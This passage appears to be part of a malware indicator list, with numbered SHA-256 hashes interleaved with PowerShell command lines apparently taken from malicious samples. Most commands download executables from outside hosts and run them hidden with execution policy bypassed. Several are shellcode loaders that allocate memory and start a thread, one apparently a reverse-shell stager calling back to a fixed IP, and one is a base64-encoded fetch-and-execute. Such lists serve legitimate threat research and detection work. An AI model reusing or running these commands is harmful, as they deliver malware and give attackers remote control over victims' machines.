  302. aabab443b3847b50c41fead9af0ee8e20a759645669d2bfd901ae686cd60ba01
  303. ac0975f1dff1676def9333805d6fa2a39a1ca32c1a99550f6596f186f1424369
  304. ac3f4a639dda7c91fd60d1973718c4823de253c2f94bb10d8466b88e09d86270
  305. ad585017bf4f6013336d040a08dfddd568d0602282446fbfb358a9604a7b8d66
  306. adb37e7afa954fd306e6805fa68a2f466a59f69f5e21d9fc60b9d9083fd6bcb4
  307. adfa0b413c8d053d122e88a67b4dc4e69ff0317d4a33d82506f42b5cb8d7f90e
  308. aef57030d1655315094746d458ca1156d13ae39fd30cb9278b2628ad4b87e697
  309. b03f655388d33f32d7c60bbc86f9eabba20358c55f3b9758182241d5861498c3
  310. b18d7c9f10ac6f56f1e1a8616e8a13862f961e8e01078fb2c2f8b9773d26118a
  311. b1e06b352d8f518fb30747ce99f1cc03ea7914d9d5285f33302c5bfbaa1d8325
  312. b23ff4b649d88fc3c079c6fe2e2a9b6f48cf72f9189e44cf14e81d4561860621
  313. b358ede71fa50063ee5232766a8a1c112aeb4f912cf3f9ba9a3e71e7db4e7c13
  314. b508ee5ed348a1e523053b74e852d59316c081fda40ea244596eb3c866e6bc67
  315. b515f4ae9577b6bd00574af37dd595b060f4eccb3afef1aa9877821afe215090
  316. bb1199f4609bfcd7dd6a919526572653325fb196431b366bbfc1a1dfc1fb19ca
  317. bb5648ecda9ef839fa972094fe9505fefa77b83bb5efe6a97b744344e4b6f306
  318. bbe7af693d99e8068b267c99fef890bd1a368e6e56d39a90e80575b34fb50a5c
  319. bd3692879ca7d1f9bf5ce68a1a25a26ab19ab7237eb5ffe6314b5da3b934e8a4
  320. be3bc565dd92c03a4c75b7c136f9cc1a4b67e58841b155843062d06eb30eb520
  321. be68fa52734d3bfb4345b4824517621a977453bf7d04bfeafc17777de8392a54
  322. bea565bb9c4b5cd0f58a4dd3ad87660e2e90b58e363b51b1ae6a58a1b2d12ba1
  323. bf59a6010d93d82205947cad328d22dd2940a1cf74f3027e955b511363f9f433
  324. c018574fc6ddb2b151d6f489e6f304caf953c2876a371d0a9d8c441388314eec
  325. c0b196e431b20ce367457cec5a70665cfe5cfbec5e8630e435d5ad1432ab47eb
  326. c186eecc1e7e977237c79d5a6b81d39f07419837fc6e6828e90285337ee23357
  327. c1f8567f2daa2f163340263bf1fa129fc5ce19d12cd4643a1ef6a39584280671
  328. c29d5f8432d67982fccdf99b565c1cb3083a0a993415ba04544d4c563ef8a865
  329. c41a9a5089a2b9a89182e847f0246ed6afcb7d05723d3362cd3087fa2a65789f
  330. c45eb8d91ca7a7734762fc2d2c0d6f8eaa01dd936a2690d880d9e968a606ec10
  331. c48b66bd01ec95586945409d55d72434919f1ea27312af01fb14807fa2a2676f
  332. c591f59ef6b2988bca1c680f17b4821207c5f31208dcceea3f09fb8b6cc41777
  333. c5b94eab05608b42ab2e1df0c3250fa174f5b8bfa13266bd5d8ad97912a3da96
  334. c6239575fe180aa97340e31ceed6c06e8e676d734d111716090183654026df5c
  335. c8cecde9c7fd3dba9d3f69b019a400619a7d495ed59c4482308e97fc48474d55
  336. c9a506fd6460cab9fae54b08309e40d10c98433cff9b1b67c774fceb8ec8b19c
  337. cd87557edbad5511163f5753938d1ba15a45977ee47e20039ff971065e611a85
  338. cde0debac5642d9f7855dfe9e5529855578242756cff7d03b586f3b02068fead
  339. ce6d4f49c47cc32410b50f3e0436079c626274728901e5f061c5ddbd43f0edec
  340. d04ca08db52145bac11aea111c218d8e24d35d51e300eb3ebb0964c79cbc29a1
  341. d0869f6ff5e8326ec7b1338f82a0351f0a486bc92b11afce5d5f08997b59a067
  342. d0debad8189a11142853648e31a5d79ea8fbf885453bd083911cf319986703e4
  343. d0f06ac23dae86c5904f319964f1db4bf1e4ceffd320af77a758ba0fbe5638a3
  344. d2ecf9ee3045330aafd94e33d9d10b80e1955d90f098b1d01108043e5947bc3f
  345. d3fd7d2793605011586e73c550354102b860d198340f635687bf9a816a50e9dc
  346. d45c584ddc70732fdce2e2f0c07f75ed53ea3b8f8df6540d8e628c442805fa6a
  347. d5c646366df29f6098a83262261d231052bed41906512e1231e74620ca519a98
  348. d5e4e43b29b13ed148b728fda7e728084acd2d56e09b2bf098b2804d1c596823
  349. d6a743e61fe0a591ba9db9e5b1e768740f2be73ab54bd135be98372f2aa0caa0
  350. d774cd34b328d683ea2651da67f208d6ee74ed94c1541e3d43f7527f8fa1e7f1
  351. d8da0b29392b036e9a754b7d93a2321989fd0683cc6b4fbe08049ae20381dfb7
  352. d90f14d299e7a0279fb22c6aacd1c29c5c59a98b399cfe864ea1026dad343500
  353. d99e36fc944ed7c081ceb032c033713e73972d3dd164a8bcc22d1aadfe5438c3
  354. dac0e4956d0d6a09653c6cb839e902e379900ab6aab7ef36994c3d07b4657550
  355. dbc8c7fa90164b35032d4b45ae24c0e9377dff5e41c1447fdeda5dcea1fc8b9c
  356. dcafe60150a0679f0ad65273d816d7d3242bca8849f2bbf2824b7d69bd51be18
  357. dd14e2d69da83c65fbd5ff5d11b150e8e9f082b12f0effacb24b298ffc877ef7
  358. dd6a75eb6bf716cd6632865d9bdce4f592b01653ed71bfce7575b8150daa9063
  359. dda52835435f522a6a9a816d1c6b252dc89ed6dfaad8ebe7f7ead3df138c20b1
  360. de0db1b30c7f90a29c9b8c5f4d7bbbc347d4785554a5b43cb857894f76b4b57b
  361. df1a6a941121868176709d78a3a85e50c05279d750302b8b01df8d80a4f4908d
  362. e12f1ed6f6060802e4e1059df067ef9c230b1798d3f47c109781553f9c68eb6e
  363. e1c8f278ac0e6f5eafce9d044cfc6bef976ca67d44a3558b913a05af4b5090a9
  364. e35be56ac836a6cd1cc80d61e67b4180ea72cf57b3d2b095030a0e5d7205bad2
  365. e4301f8b9f414f0ef52f567b31b1874ee9ab1feee6595981cd73a9077e37af53
  366. e44d2a7a2bcef4d2993c468b8a71e1766e568c97a34f380f780deb2166c577fd
  367. e5099732525202db697179068649795992b39ff2382189e93239a59782730b65
  368. e5a3c270aa08a8e45e6591312f0c267a95d779c82a8541757a3fec9a86974d7e
  369. e60a0f1355a30b380747f08a5be3fd295f1a5cac858e5322651ac6dbf3bf0a77
  370. e622276d7379df7e53cd2b0b77614ba8b86535a8c654e9e7a434cdbd1d3d14fd
  371. e642aa7113c8d620496ad00dfb4e3caa9a3fd31af97c6d8c18fce956ccad76fa
  372. e69c4dd5cc45022818eccdd06f6b8a4847b99566282e1c4eab4bf96d11365a3f
  373. ea1ecd5fb42ca99cf93b01a75e75062dcae227acc7e3d6e88345da668d1c76b3
  374. ee7dcce3834864bc06626b1a479b3646826f953419331d35a0e0bace789c306c
  375. ef14c982d3d14cad890db796efb6dae15e20effc95f49e95067fb73fe4c92114
  376. f0c9d64fd4283daa8f06d361ee9c94eb812cdddd879b5bd5f4766a8e96361de7
  377. f1aa7c9cbe78a6186af046d8cfa8dd793b141aeff740674a0901197a206bc868
  378. f2138b003e084d1af989602ae1b9042174b0dc1e46aee661f9ea1cbb6a8f44e8
  379. f2a5473e43985b7fc150be9d0a9629b90180510ce5bcf2bdcea41aa98deb28c5
  380. f300080344a90339b20e2a7efe1c1e7645945b2f9bb4a35a3b022b6422eadd3a
  381. f37d597f4218520a7dc9fbabcad45ade1f59df1a6d7fe837024c07dbe3419431
  382. f511b5c8a0031bfb91f1c2750529e32f1cb31283a826292a6984878fbc181944
  383. f61ea78bfaae26f2fcda109143337d537dca4e71d9494ad146082006e84b2d01
  384. f80b385d8a7042f121efa5a5c3ddffa8e1a063f39b7aa630be03ca1619e011c9
  385. f9ba506246606fda97fba7e8002b3ec04cb2f14383e36a45b7af748c16e55fb7
  386. fabdc7a1c759397940820f9e9f2c8f15fb5869fc865ab44fe8cac6efb5df0638
  387. fc6fb4ab5ddb74c2366cc7349b43bb4b920370d026f9574857e0bdc2ef62a08a
  388. fd89fceb569619a5eb0c4be207283f10a71940d382e3a3366325757bebd9e14d
  389. fda56513d6335182362352afbe7c081385410f589c9cd704a8de84355d85e996
  390. ff132bdfc91aa081b172cb26db49a89c8e03de4e717ed19f8a3b2265756322e0
  391. ff38913c13e502f272a317834b4303dcb7a14368ffb598ab364384e274577452
  392. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex $env:keyezg
  393. 389be8874d509d640f5168b717d54490c1a89a98bd9022f2009c0a020bbc0e5b
  394. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -ExecutionPolicy bypass -noprofile -file C:\Users\User1\AppData\Local\Temp\adobeacd-update.ps1
  395. 0b455b0a1e03bf1534a2edbd2f5ce3353ef45a52d29410555db15900f5aed157
  396. 1145d843a5b1dce55639d84e61f56c585aa6b721abe984ca003623217a399219
  397. 2d55534d424808b148f956deea869b1603892ed29b361c4eafb276275a85bee0
  398. 972769d84ce753ac329f57e2ef1f918d7d510bac06cff628a2e349babbaf53e8
  399. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -Command iex (New-Object system.Net.WebClient).DownloadString(\"https://goo.gl/vT8SrG\");Invoke-Shellcode -Force -Shellcode 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0xbb,0x1,0x0,0x0,0xe8,0x75,0x1,0x0,0x0,0x2f,0x43,0x72,0x64,0x61,0x34,0x78,0x76,0x35,0x54,0x59,0x6f,0x50,0x7a,0x41,0x37,0x4e,0x57,0x41,0x6f,0x42,0x6c,0x77,0x50,0x46,0x72,0x6c,0x35,0x6f,0x47,0x62,0x57,0x53,0x2d,0x6f,0x44,0x48,0x6d,0x39,0x51,0x32,0x48,0x41,0x32,0x6e,0x78,0x30,0x56,0x4b,0x4d,0x62,0x75,0x66,0x65,0x44,0x66,0x37,0x58,0x50,0x72,0x35,0x79,0x30,0x75,0x78,0x33,0x65,0x6d,0x6d,0x6c,0x6b,0x79,0x4f,0x55,0x7a,0x49,0x4d,0x30,0x39,0x73,0x45,0x49,0x62,0x6a,0x6a,0x37,0x5a,0x37,0x4c,0x38,0x74,0x55,0x6d,0x4b,0x64,0x5f,0x6d,0x48,0x36,0x64,0x70,0x51,0x4c,0x33,0x33,0x34,0x59,0x6c,0x6e,0x54,0x61,0x32,0x72,0x74,0x59,0x42,0x61,0x63,0x48,0x51,0x53,0x67,0x53,0x46,0x59,0x53,0x6a,0x56,0x37,0x45,0x5f,0x76,0x76,0x30,0x48,0x53,0x54,0x58,0x4e,0x36,0x66,0x43,0x6d,0x72,0x68,0x4e,0x45,0x52,0x6a,0x56,0x56,0x69,0x76,0x34,0x7a,0x31,0x37,0x43,0x58,0x64,0x6b,0x4d,0x58,0x4c,0x59,0x67,0x6f,0x73,0x7a,0x59,0x56,0x6e,0x35,0x6d,0x64,0x4f
,0x63,0x62,0x63,0x37,0x54,0x64,0x35,0x45,0x36,0x50,0x62,0x76,0x36,0x48,0x39,0x51,0x71,0x38,0x4f,0x63,0x4d,0x42,0x72,0x6d,0x52,0x47,0x71,0x39,0x49,0x48,0x34,0x38,0x49,0x44,0x44,0x6f,0x54,0x30,0x6e,0x79,0x2d,0x77,0x6f,0x6f,0x4d,0x35,0x6a,0x57,0x66,0x4b,0x5a,0x49,0x45,0x74,0x51,0x4f,0x47,0x4e,0x74,0x39,0x33,0x72,0x37,0x43,0x74,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x68,0x80,0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xd9,0xe8,0x4b,0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77,0xff,0xff,0xff,0x31,0x34,0x38,0x2e,0x32,0x35,0x30,0x2e,0x31,0x37,0x38,0x2e,0x35,0x39,0x0,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5
  400. 58cca44e84752645115d3dc2d258581717e77b15c1c5d5c99ce44debd9570064
  401. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -s -NoLogo -NoProfile
  402. 76ab5c9b0d57cd0f49a723fa89370e21e92a645ee80980c18c17bd7599891686
  403. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('http://fa-gf12.com/pay/jinC.exe','C:\Users\User1\AppData\Local\Temp\Server.exe');
  404. c73009b649b91d89b68aab5147d708d20761ca29b10c3fb12a5ef47a66b4d5a6
  405. PowerShell  (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/sspail.exe','C:\ProgramData\.System32_dll.com');Start-Process 'C:\ProgramData\.System32_dll.com'
  406. e91dc2e9b83b93ef6bd7e99a7c2a6c98384927f04f5f3e986f2c41b45f5a09f4
  407. PowerShell  (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/xavadd.exe','C:\ProgramData\.System32_dll.com');Start-Process 'C:\ProgramData\.System32_dll.com'
  408. 4c773f99c8d7ce73420c4b1a4c75b2645f2465fa3115b299ea10d3bef9f7671b
  409. PoWerSHElL  (nEW-oBjEcT sYsTeM.neT.wEBcLiEnT).dOWNLOadfIlE('https://www.sendspace.com/pro/dl/fd21lb','C:\Users\User1\AppData\Local\Temp\wordfile.exe');
  410. 01be4aee732869702502fe67a25810af4db67328c1b8917e6d527a67c63fba8b
  411. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.WebClient; $wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://www.scuoladanzamaja.it/cgi/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  412. 2312095f09a699bac2b80558442843062e96b49503f81773f61c367937e350ce
  413. 4dad0b90279a2ffdd0dd4acf6031315dcb6dd730d13c6025c78038d2746447a3
  414. 9d348fb076847815688c8d2e46d5b7a9388874c70a19dc7532932bf7b594825f
  415. a08cc2aa8461599f9b88cea5bbe868ed98ddaa3d55b6bcbcdf3ef72f3feeaacc
  416. fb9980ab94268c1a344c3b116e7a4c3898ba309922d1de32ceca06fc7c66a90d
  417. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://djprestige.net/111000/logs/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  418. 981292307b2018f2fb40c8e48210a67920520d09fbcdf3258ceee0313b196be2
  419. 9ed345a0f71ce22058cb36ed1e1235c7f2be188b7d14ead19fd1f2ade3a5e106
  420. afc43f0d32256ca6d8be608e10622db9e18af95dd1649ee671aacf006e03a398
  421. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden $wc = New-Object System.Net.Webclient;$wc.Headers.Add('User-Agent','Windows-Media-Player/11.0.5721.5145');$wc.DownloadFile('http://justins-gift.com/public/php/logs.php','C:\Users\User1\AppData\Local\Temp.exe')
  422. a165e2730c184eb6534a0aebc0041c75246e8ea67f040884d3f6e7e139da7f42
  423. c4203773250da3eb00c13b4ac2b12aad66f3427c31f99d6d46ff502300ff5d17
  424. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Objecstem.Net.WebClient).DownloadFile('http://mobgroup.ga/teamview/teamview.exe','C:\Users\User1\AppData\Roaming\tandjeGerst.exe');Start-Process 'C:\Users\User1\AppData\Roaming\tandjeGerst.exe'
  425. a98a64a0976bb774a963886cf123ba2510ca716c883e86731cb04f33488c36de
  426. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Objecstem.Net.WebClient).DownloadFile('http://mobgroup.ga/updated/detected.exe','C:\Users\User1\AppData\Roaming\tandjeGerst.exe');Start-Process 'C:\Users\User1\AppData\Roaming\tandjeGerst.exe'
  427. 6360306ffc0095cac18b86dcb8b243801f493ea6592c7c78c1209d00a8d10f23
  428. PowerShell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://allmods.esy.es/MessageBox.jpg','C:\Users\User1\AppData\Roaming\Example.exe');Start-Process 'C:\Users\User1\AppData\Roaming\Example.exe'
  429. 972a51b33b15f516e95ec06b6c56b2cd58bdb8365c24de2e6731bbc7aac3b6da
  430. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/ayo.exe','C:\Users\User1\AppData\Roaming\mgrhost.exe');
  431. 5a62b0a734444c2ba92fc2ea3baf8f6631593ab9259cbe744d109fe2fdb9aa79
  432. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/binld.exe','C:\Users\User1\AppData\Roaming\svchost.exe');
  433. 861fa402873b5946193c27dafd793650fc0bafc8580178ce76953ebcacc25e05
  434. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://bocinvest.com/wp-admin/css/upload/oko.exe','C:\Users\User1\AppData\Roaming\conhost.exe');
  435. 35ce16db318aeabd073824bae6e9ca8c420320347da152c66b8f653accceedcb
  436. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://onwajan.su/x/setup1.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  437. 822709b3c811f982d774372208d0ea1e4b58c965e9bc7313645a37668974581f
  438. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://onwajan.su/x/setup2.exe','C:\Users\User1\AppData\Roaming\DFSHJhdxzwdfsn.exe');
  439. 9f70ab3654eedbca4ff648a5ad657d78aac7e7a2e196fb81731ede72c2a2d896
  440. powershell  -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kalodon.ru/dgsdskld/abx.exe','C:\Users\User1\AppData\Roaming\hdsgddgf.exe');SaPs ('C:\Users\User1\AppData\Roaming\hdsgddgf.exe')
  441. 4456c5b0db3dc0f3a752131c1166d306ff2a0db7c750b264538a6067b8a88b18
  442. powershell  -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://www.kalodon.ru/offshore/oorder.exe','C:\Users\User1\AppData\Roaming\hdgshfg.exe');SaPs ('C:\Users\User1\AppData\Roaming\hdgshfg.exe')
  443. 2458c167c38a37556a94c13e64b11481a438bfd5ebc3b44ff893a9d2bd744bab
  444. c66dba97d621959db58f18f6e0639f25cb773d329bf4c8f592b8283863e625e6
  445. powershell  -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/ccnxkl.exe','C:\Users\User1\AppData\Roaming\ZNDRTwyhhabeerty.exe');
  446. 4e489b1544630beb9c2f172ee1440201f095361599d2b617705001551101c935
  447. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/ac/ah.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  448. d3867179fc9585f8611ad7d1af7cfb5ef30fc734cb3c3b9c1b4e200e1dd61232
  449. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/bin/osf.exe','C:\Users\User1\AppData\Roaming\Example8312.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example8312.exe')
  450. 6836c93b9014b6260e381b055c6d9549402b04a3c7e3298b0793cbd0a1cafd73
  451. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/gg/gp.exe','C:\Users\User1\AppData\Roaming\Example812.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example812.exe')
  452. d5ab58179a1dd45d630a74ddcb9c7a156c72c43e99590a6b982658ed8b77308f
  453. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/mm/mm.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  454. 6ae6fca9ff8b340a773c5dcc42b38a0f9f8762afa292741a663376262c7ff80a
  455. 839ab04e0808a9917ac2a2f43630554ca3a87bc536a7b64051e027c13fd50b2a
  456. f1a2bb54d9e6ffd39807d9ec8d43a3ed1373a3e08dc811e4be8233f496839454
  457. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/pl/hn.exe','C:\Users\User1\AppData\Roaming\Example902.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example902.exe')
  458. 53bdde93f826091bcdda40a71006fa6d79c950500c95006054d2a33af2d6244c
  459. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/u/uu.exe','C:\Users\User1\AppData\Roaming\Example83.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example83.exe')
  460. 2e52da7e89bba6ed9f9ac788316515f6f636adc2b61189e701de03b88b73f5f9
  461. powershell  -ExecutionPolicy Unrestricted   (New-Object System.Net.WebClient).DownloadFile('http://cahajipur.com/zz/zb.exe','C:\Users\User1\AppData\Roaming\Example783.exe');Invoke-Item ('C:\Users\User1\AppData\Roaming\Example783.exe')
  462. 40cd5f896128ca94b383174ff0efe30fdaf35acae05fa1d96c8b244daf2e00ff
  463. POwErShEll  SeT-ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://cl.ly/3g1K2o1F1T21/download/odebrecht.office','C:\Users\User1\AppData\Roaming\Office1.exe');
  464. c0cd639515e505ac8ba0d93ea1f273e34125f82854ab392f51c6a4f6c930f5d7
  465. powershell -ExecutionPolicy Bypass -noProfile -NonInteractive -nologo -encodedcommand "WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgACcAUwBzAGwAMwAnADsAIABpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGgAbwBsAGkAZABhAHkAYwBsAHUAYgAuAGMAbwAvADEAJwApAA=="
  466. fc1b9ffd2b97102d8cbdbb101341293d16aa875925f4a9c21cd6af1a481c624e
  467. powershell iex (new-object net.webclient).downloadstring('http://10.2.21.74/favicon.ico');read-host
  468. fbb77215d4b635114efe0618fc23623a1d8aa9bd036f0d3178f3dcc4cc4b73ce
  469. powershell -nop -win hidden -noni -enc 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 --> $b7eE = '$7QqL = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $7QqL -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x2a,0x84,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5
,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$8BcV=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($8BcV.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$8BcV,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($b7eE));$jfX = "-enc ";if([IntPtr]::Size -eq 8){$H7OY = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $H7OY $jfX $e"}else{;iex "& powershell $jfX $e";}
  470. 2844a019629a3b8f5885b51263ee4de1febda1d401ac81a1084104275ab6f693
  471. powershell -nop -win hidden -noni -enc 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 --> Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
  472. a524cd84bfc9e58b5f3b12fe812c08a79af3de42c0ca1b976a92e3eaf52cb39b
